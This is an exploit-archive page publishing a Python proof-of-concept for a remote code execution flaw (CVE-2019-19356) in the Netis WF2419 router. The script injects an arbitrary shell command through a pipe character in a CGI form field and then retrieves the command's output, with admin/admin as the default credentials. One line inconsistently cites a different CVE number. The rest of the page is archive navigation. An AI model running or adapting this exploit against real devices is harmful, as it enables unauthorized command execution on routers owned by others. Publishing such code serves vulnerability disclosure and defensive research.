Netis WF2419 2.2.36123 Remote Code Execution

Netis WF2419 2.2.36123 Remote Code Execution: Posted Mar 2, 2020; Authored by Elias Issa; Netis WF2419 version 2.2.36123 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2019-19356; SHA-256 | 22aa5eac15aadbbbe2668ffb88c241e62f80f6a1ddc35e9f7c92e0c007312e6c; Download | Favorite | View

Netis WF2419 2.2.36123 Remote Code Execution

# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution 
# Exploit Author: Elias Issa
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75
# Date: 2020-02-11
# Version: WF2419 V2.2.36123 => V2.2.36123
# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123
# CVE : CVE-2019-19356


# Proof of Concept: python netis_rce.py http://192.168.1.1 "ls"

#!/usr/bin/env python
import argparse
import requests
import json

def exploit(host,cmd):
  # Send Payload
  headers_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',  
      'Content-Type': 'application/x-www-form-urlencoded'}
  post_data="mode_name=netcore_set&tools_type=2&tools_ip_url=|+"+cmd+"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0"
  vulnerable_page = host + "/cgi-bin-igd/netcore_set.cgi"
  req_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)
  print('[+] Payload sent')
  try :
    json_data = json.loads(req_payload.text)
    if json_data[0] == "SUCCESS":
      print('[+] Exploit Sucess')
      # Get Command Result
      print('[+] Getting Command Output\n')
      result_page = host + "/cgi-bin-igd/netcore_get.cgi"
      post_data = "mode_name=netcore_get&no=no" 
      req_result = requests.post(result_page, data=post_data, headers=headers_value)
      json_data = json.loads(req_result.text)
      results = json_data["tools_results"]
      print results.replace(';', '\n')
    else:
      print('[-] Exploit Failed')
  except:
      print("[!] You might need to login.") 

# To be implemented
def login(user, password):
  print('To be implemented')

def main():
    host = args.host
    cmd = args.cmd
    user = args.user
    password = args.password
    #login(user,password)
    exploit(host,cmd)

if __name__ == "__main__":
    ap = argparse.ArgumentParser(
            description="Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]")
    ap.add_argument("host", help="URL (Example: http://192.168.1.1).")
    ap.add_argument("cmd", help="Command to run.")
    ap.add_argument("-u", "--user", help="Admin username (Default: admin).",
            default="admin")
    ap.add_argument("-p", "--password", help="Admin password (Default: admin).",
            default="admin")
    args = ap.parse_args()
    main()

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Netis WF2419 2.2.36123 Remote Code Execution

Netis WF2419 2.2.36123 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Netis WF2419 2.2.36123 Remote Code Execution

Share This

Netis WF2419 2.2.36123 Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems